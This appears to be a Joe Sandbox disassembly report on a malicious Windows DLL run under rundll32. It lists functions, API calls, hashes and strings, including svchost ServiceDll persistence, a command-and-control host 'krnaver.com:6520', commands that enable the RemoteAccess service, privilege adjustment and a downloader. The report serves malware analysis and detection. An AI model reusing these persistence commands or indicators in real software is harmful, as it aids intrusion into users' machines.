                                                        • Opcode Fuzzy Hash: 766fc4c91f3afb022d82f0411d261274f1b7f6a8cc47e5443cc1c5075a28d2e0
                                                        • Instruction Fuzzy Hash: 59314DB4504360AFE314DF65CDC9A5BBBE8FB8A310F40851EF655872A1D7B4D484CB22
                                                        Function 10005A10 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 473COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wcscat.MSVCRT ref: 10005B73
                                                        • InterlockedDecrement.KERNEL32(00000008), ref: 10005E38
                                                        • _strcmpi.MSVCRT ref: 10005E55
                                                        • InterlockedDecrement.KERNEL32(00000008), ref: 10005F59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DecrementInterlocked$_strcmpiwcscat
                                                        • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                        • API String ID: 1133782235-2685825574
                                                        • Opcode ID: 81061a4a8877450d9953acb6a68e8a364d5bf9f7be26c08b031fa8b21c164d1e
                                                        • Instruction ID: 6e287e9f31d80ddeef40d71180199f244c4fab3bb8e43f45771c3167a968cc53
                                                        • Opcode Fuzzy Hash: 81061a4a8877450d9953acb6a68e8a364d5bf9f7be26c08b031fa8b21c164d1e
                                                        • Instruction Fuzzy Hash: 7702E5715043469FE720DF64C880AAFB7E9FB88394F008A2DF5999B280DB75DD85CB52
                                                        Function 10006C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Versionsprintf
                                                        • String ID: 2000$2003$2008$Vista$Win %s SP%d
                                                        • API String ID: 1728264858-2264339393
                                                        • Opcode ID: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
                                                        • Instruction ID: a29b5034d98c82e8cdd23dc3c09a1f19a03f2c0ff95b6a49c00505b641ceb439
                                                        • Opcode Fuzzy Hash: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
                                                        • Instruction Fuzzy Hash: 353106317043845BF724C524C854A9BB7D7F7C9360FA18B2EEA5AC7384DA74CD098242
                                                        Function 100052A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 10005333
                                                        • wsprintfA.USER32 ref: 1000537B
                                                        • FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 100053E8
                                                        • FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 100053FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s$.$\*.*
                                                        • API String ID: 180737720-2210278135
                                                        • Opcode ID: 7ae711e90393dddcf603e56f6566a1c76344e8b8096dc20234aff7e6c32f04f1
                                                        • Instruction ID: 4a8f082e370a774beec3181923ed0c29b1814dc50db52cf211b5320ae6ff64cd
                                                        • Opcode Fuzzy Hash: 7ae711e90393dddcf603e56f6566a1c76344e8b8096dc20234aff7e6c32f04f1
                                                        • Instruction Fuzzy Hash: 843117761043445BD328CA74CC45AEBB7D9FBC8360F144F1DF6AA832C1DEB5DA088652
                                                        Function 10004B90 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,100071DE), ref: 10004BAE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 6918ca5b7ee3fdd7fdd57af262338b3703b36aad1a9c509f7b5eed579482c4b1
                                                        • Instruction ID: 7aec9a8afb9612b2565e4992fccd33789a9d9f25d87dad6da5c42f08927fd536
                                                        • Opcode Fuzzy Hash: 6918ca5b7ee3fdd7fdd57af262338b3703b36aad1a9c509f7b5eed579482c4b1
                                                        • Instruction Fuzzy Hash: 93D0BCB5618342AF9704CF58D994C3BB7E9BBC8600F148D0CB59583254D770E849CB62
                                                        Function 100049F0 Relevance: 1.5, APIs: 1, Instructions: 6shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 100049FA
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ExitWindows
                                                        • String ID:
                                                        • API String ID: 1089080001-0
                                                        • Opcode ID: d9c7e62c82f4d30f92caf57cdc1ee715cd7a3c5a069c5de49ecc06ad1114ff61
                                                        • Instruction ID: a05cb85966f44a46be1bad41a18f52861b6e79887c5960e28fbbb47f88fe4381
                                                        • Opcode Fuzzy Hash: d9c7e62c82f4d30f92caf57cdc1ee715cd7a3c5a069c5de49ecc06ad1114ff61
                                                        • Instruction Fuzzy Hash: ACB012F4204300BFDE04CB50CA84C2B77E8EBCC301F00884CF48982110CA34DC40CB11
                                                        Function 10008180 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 270COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 100083AA
                                                        • ServiceDll, xrefs: 1000835D
                                                        • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 1000830D
                                                        • RegOpenKeyEx(Svchost), xrefs: 100083F4
                                                        • %SystemRoot%\System32\svchost.exe -k , xrefs: 100081C5
                                                        • RegSetValueEx(Svchost\krnlsrvc), xrefs: 10008431
                                                        • SYSTEM\CurrentControlSet\Services\%s, xrefs: 100082B7
                                                        • RegSetValueEx(ServiceDll), xrefs: 1000837F
                                                        • Description, xrefs: 100082EB
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID: %SystemRoot%\System32\svchost.exe -k $Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                        • API String ID: 1452528299-660433390
                                                        • Opcode ID: b6460b91ff4555f9262201c81e413c6a0d3e914efe51d2911cf23552081a28e0
                                                        • Instruction ID: 53f7441aff76953b2d88f4f78352e93fbc22bdf5a514338d65ce7cfd2a42bf55
                                                        • Opcode Fuzzy Hash: b6460b91ff4555f9262201c81e413c6a0d3e914efe51d2911cf23552081a28e0
                                                        • Instruction Fuzzy Hash: 3B91A471A00259ABEB14DBA4CC85BEE77E9FB48750F144259FA06A72C0DF749E80CB60
                                                        Function 10006380 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211filesleepinjectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • c:\windows\system32\drivers\%s\%s, xrefs: 10006497
                                                        • %s\%s, xrefs: 1000640B
                                                        • c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 1000656F
                                                        • c:\windows\system32\drivers\%s, xrefs: 1000647E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
                                                        • String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
                                                        • API String ID: 3377497938-1917988604
                                                        • Opcode ID: aa527d4a18a4aaa306d25193b5c72e572f2e79281c43732195b351378c99ff71
                                                        • Instruction ID: 38fc729683442f2de153c52376bcce47659d60a47f0b68a34b16a9871db267a9
                                                        • Opcode Fuzzy Hash: aa527d4a18a4aaa306d25193b5c72e572f2e79281c43732195b351378c99ff71
                                                        • Instruction Fuzzy Hash: F761C171204345ABE728CB74CD85BDBB7E6EBCC300F048A2CF64997291DB79E6498752
                                                        Function 10006AA0 Relevance: 36.8, APIs: 7, Strings: 14, Instructions: 96stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 10006ACE
                                                        • GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006AE5
                                                        • GetModuleFileNameA.KERNEL32(10000000,c:\ftelcs\rjqzr.dll,00000104), ref: 10006AF7
                                                        • strrchr.MSVCRT ref: 10006B25
                                                        • wsprintfA.USER32 ref: 10006B3D
                                                        • wsprintfA.USER32 ref: 10006B4E
                                                        • wsprintfA.USER32 ref: 10006B5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: wsprintf$FileModuleName$strrchr
                                                        • String ID: %s.txt$%s\ReadMe.txt$%s\version.txt$09161305$09161305.txt$ECF4BB45F69D$M%s$Mkrnaver.com:6520$c:\ftelcs$c:\ftelcs\ReadMe.txt$c:\ftelcs\rjqzr.dll$c:\ftelcs\version.txt$c:\windows\SysWOW64\rundll32.exe$krnaver.com:6520
                                                        • API String ID: 1444062329-90664482
                                                        • Opcode ID: cd56bb71b5e34af3bf83d4319db678bda11d80ad42d94f8a2d2da32989abb340
                                                        • Instruction ID: 732538d88aa81fda7fc38e0d93b527bb5c3b02a2f58effd2b7974e2766805a37
                                                        • Opcode Fuzzy Hash: cd56bb71b5e34af3bf83d4319db678bda11d80ad42d94f8a2d2da32989abb340
                                                        • Instruction Fuzzy Hash: 0B21F675600A156FE314EB798C41FAA7AC2FB88360F544618F7269F2C1CFB4D981C654
                                                        Function 1000F6F0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: _mbsicmp
                                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                        • API String ID: 1961004622-51310709
                                                        • Opcode ID: 9a2839b0c050d57ee1fa6452c1e67cdcab6d0cd9156314fcd384c4b2c94964e5
                                                        • Instruction ID: 7359167a5fcbd9a806bd145f27a2597d23e7ec4f774172bc2e2fd2a42e6e49a2
                                                        • Opcode Fuzzy Hash: 9a2839b0c050d57ee1fa6452c1e67cdcab6d0cd9156314fcd384c4b2c94964e5
                                                        • Instruction Fuzzy Hash: 2321B422A0816221BA00B52D7D406EE93C8CFE20E6B07403AFD58D9A19FB55DDC3A4E7
                                                        Function 10005030 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 10005069
                                                          • Part of subcall function 10004DA0: CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                          • Part of subcall function 10004DA0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                          • Part of subcall function 10004DA0: time.MSVCRT(00000000), ref: 10004E7F
                                                          • Part of subcall function 10004DA0: _localtime32.MSVCRT(?), ref: 10004E8E
                                                          • Part of subcall function 10004DA0: strftime.MSVCRT ref: 10004EA1
                                                          • Part of subcall function 10004DA0: vsprintf.MSVCRT ref: 10004EF3
                                                          • Part of subcall function 10004DA0: sprintf.MSVCRT ref: 10004F13
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
                                                        • String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
                                                        • API String ID: 3192119092-4191049792
                                                        • Opcode ID: ba6a527f4a739631b566123cca767d18ee45be973559c480ae428ec06e6e2757
                                                        • Instruction ID: 4e1dc663dc5c2e20ab1e8d508aa2f617d19e20be5b77b03456e3f7bde4afe704
                                                        • Opcode Fuzzy Hash: ba6a527f4a739631b566123cca767d18ee45be973559c480ae428ec06e6e2757
                                                        • Instruction Fuzzy Hash: 4C112BB26401147BF3119754EC8ABEB3348DF84352F414131F70496181DA76E5A8C6B7
                                                        Function 10007F60 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 99processregistrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _CxxThrowException.MSVCRT(?,100147E8), ref: 10007FE5
                                                        • _CxxThrowException.MSVCRT(?,100147E8), ref: 1000801D
                                                        • lstrlen.KERNEL32(?,00000000), ref: 10008043
                                                        • WinExec.KERNEL32(sc stop RemoteAccess,00000000), ref: 1000806C
                                                        • WinExec.KERNEL32(sc config RemoteAccess start= auto,00000000), ref: 10008074
                                                        • WinExec.KERNEL32(net start RemoteAccess,00000000), ref: 1000807C
                                                        • RegCloseKey.ADVAPI32(?), ref: 10008082
                                                        Strings
                                                        • sc config RemoteAccess start= auto, xrefs: 1000806F
                                                        • sc stop RemoteAccess, xrefs: 10008067
                                                        • DLLPath, xrefs: 10007FFD, 1000804D
                                                        • U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==, xrefs: 10007F86
                                                        • mp3, xrefs: 1000802E
                                                        • net start RemoteAccess, xrefs: 10008077
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Exec$ExceptionThrow$Closelstrlen
                                                        • String ID: DLLPath$U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==$mp3$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
                                                        • API String ID: 2220367965-2251003411
                                                        • Opcode ID: 8b7e3d6da74423e4f7df1cee934fc3ce02715c38fd0b714f26f77314a7f6a13a
                                                        • Instruction ID: 386c89186cab945f5a718573854e040faaf77393de1b5ed21536ee36dbd8ba18
                                                        • Opcode Fuzzy Hash: 8b7e3d6da74423e4f7df1cee934fc3ce02715c38fd0b714f26f77314a7f6a13a
                                                        • Instruction Fuzzy Hash: 4131AFB5900159AFEB10DF94CC85EEFBBB8FF49250F004169F604AB140D7749E848BB2
                                                        Function 1000A9F0 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 338COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID: JS0yNHMgJS0xNXMgJXMgXHJcbg==$JS0yNHMgJS0xNXMgMHgleCglZCkgXHJcbg==$JS0yNHMgJS0xNXMgXHJcbg==$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                                        • API String ID: 71445658-1435378120
                                                        • Opcode ID: 7d424288471b201655ca4a48aa21b457367a72ea9670dcdcb4ac0206b327a908
                                                        • Instruction ID: 40b7c5c0a35248af27e297c048efb2102711e9767bb195815e86efec323737f9
                                                        • Opcode Fuzzy Hash: 7d424288471b201655ca4a48aa21b457367a72ea9670dcdcb4ac0206b327a908
                                                        • Instruction Fuzzy Hash: AEC1B8B2900158AFEB14CF94DC41FDF73B9EB89340F004299F619A7184EB74AE84CB95
                                                        Function 10006760 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 96threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 100060E0: strrchr.MSVCRT ref: 1000615E
                                                          • Part of subcall function 100060E0: strncpy.MSVCRT ref: 10006175
                                                          • Part of subcall function 100060E0: strncpy.MSVCRT ref: 1000617F
                                                          • Part of subcall function 100060E0: GetSystemInfo.KERNEL32(?), ref: 10006189
                                                          • Part of subcall function 100060E0: GetCurrentProcess.KERNEL32(00000020,?), ref: 100061AA
                                                          • Part of subcall function 100060E0: OpenProcessToken.ADVAPI32(00000000), ref: 100061B1
                                                          • Part of subcall function 100060E0: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 100061C2
                                                          • Part of subcall function 100060E0: AdjustTokenPrivileges.ADVAPI32 ref: 100061F7
                                                          • Part of subcall function 100060E0: CloseHandle.KERNEL32(00000010), ref: 10006202
                                                          • Part of subcall function 100060E0: sscanf.MSVCRT ref: 1000622D
                                                        • wsprintfA.USER32 ref: 100067A2
                                                          • Part of subcall function 10006240: strchr.MSVCRT ref: 10006296
                                                        • wsprintfA.USER32 ref: 10006808
                                                        • wsprintfA.USER32 ref: 10006821
                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 1000682C
                                                          • Part of subcall function 10005130: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,100094FF,?,?,?), ref: 10005149
                                                          • Part of subcall function 10005130: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000516B
                                                          • Part of subcall function 10005130: CloseHandle.KERNEL32(00000000), ref: 10005172
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000686A
                                                        • CreateThread.KERNEL32(00000000,00000000,10006630,00000000,00000000,00000000), ref: 10006891
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CreateProcesswsprintf$CloseFileHandleOpenTokenstrncpy$AdjustCurrentDirectoryInfoLookupPrivilegePrivilegesSystemThreadValueWritesscanfstrchrstrrchr
                                                        • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                        • API String ID: 3642037362-1421401311
                                                        • Opcode ID: d2cd299e288b3e9e98b9e1fba56ee12053f96323f8ef1271132cbb11194d2572
                                                        • Instruction ID: f20ba2a97323ed7df82d32d2797e0c63e95325ef1500b8652c68676ddbbd9728
                                                        • Opcode Fuzzy Hash: d2cd299e288b3e9e98b9e1fba56ee12053f96323f8ef1271132cbb11194d2572
                                                        • Instruction Fuzzy Hash: 2931D4715047507FE311CBA8CDD4AEB7BAAEB8D340F004929F35597242CB35E948CB62
                                                        Function 10011A66 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 187librarymemoryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 10011B0C
                                                        • GetLastError.KERNEL32 ref: 10011B18
                                                        • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 10011B4B
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 10011B5D
                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 10011B71
                                                        • FreeLibrary.KERNEL32(00000000), ref: 10011B8E
                                                        • GetProcAddress.KERNEL32(?,?), ref: 10011BEF
                                                        • GetLastError.KERNEL32 ref: 10011BFB
                                                        • RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 10011C2D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
                                                        • String ID: $
                                                        • API String ID: 991255547-3993045852
                                                        • Opcode ID: 2a11c7f7179ab892354a6a713d73592b2975e953cd869872c764eb05020c9fd4
                                                        • Instruction ID: 4d5577417f8e46cad4d298f1aa2e6885704c8343808cc9b2ee3d484d600d16ac
                                                        • Opcode Fuzzy Hash: 2a11c7f7179ab892354a6a713d73592b2975e953cd869872c764eb05020c9fd4
                                                        • Instruction Fuzzy Hash: 81614EB5A042099FEB19CF99C9C1AEA77F5FF48340F118029E919DB250E770EE85CB60
                                                        Function 10008AC0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 100076EB
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 1000770F
                                                          • Part of subcall function 10007640: strcspn.MSVCRT ref: 1000771E
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 1000772A
                                                          • Part of subcall function 10007640: strcspn.MSVCRT ref: 10007739
                                                          • Part of subcall function 10007640: strncpy.MSVCRT ref: 10007742
                                                          • Part of subcall function 10007640: strstr.MSVCRT ref: 1000777F
                                                          • Part of subcall function 10007640: strcspn.MSVCRT ref: 10007792
                                                          • Part of subcall function 10006BE0: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10006BF7
                                                          • Part of subcall function 10006F70: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F9F
                                                          • Part of subcall function 10006F70: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007059
                                                          • Part of subcall function 10006F70: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 100070B2
                                                        • send.WS2_32(00000000,?,00000128,00000000), ref: 10008B2F
                                                        • closesocket.WS2_32(00000000), ref: 10008B3B
                                                        • select.WS2_32 ref: 10008B91
                                                        • closesocket.WS2_32(00000000), ref: 10008C83
                                                        • InterlockedExchange.KERNEL32(1001B6B8,00000001), ref: 10008C94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedLanguageMemoryOpenStatusSystemselectsendsetsockoptstrncpy
                                                        • String ID: SeShutdownPrivilege$zip
                                                        • API String ID: 619725691-4289258210
                                                        • Opcode ID: 561ca7740bbf3e17141a47d3a836b13047d7a0a7756f3eff1820db465d8b02ff
                                                        • Instruction ID: 12ec0c918aa9a297be5ccc665cebabc014b02cea96a7eba10d88a6146ebaa4c5
                                                        • Opcode Fuzzy Hash: 561ca7740bbf3e17141a47d3a836b13047d7a0a7756f3eff1820db465d8b02ff
                                                        • Instruction Fuzzy Hash: 925127B0544205AAF720DB24DC85FEB77E8FB943D0F104A29FA49D61CADB74E6448772
                                                        Function 100072A0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 131libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,?), ref: 100072B7
                                                        • LoadLibraryA.KERNEL32(wininet.dll), ref: 100072C0
                                                        • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 100072E9
                                                        • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 100072F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
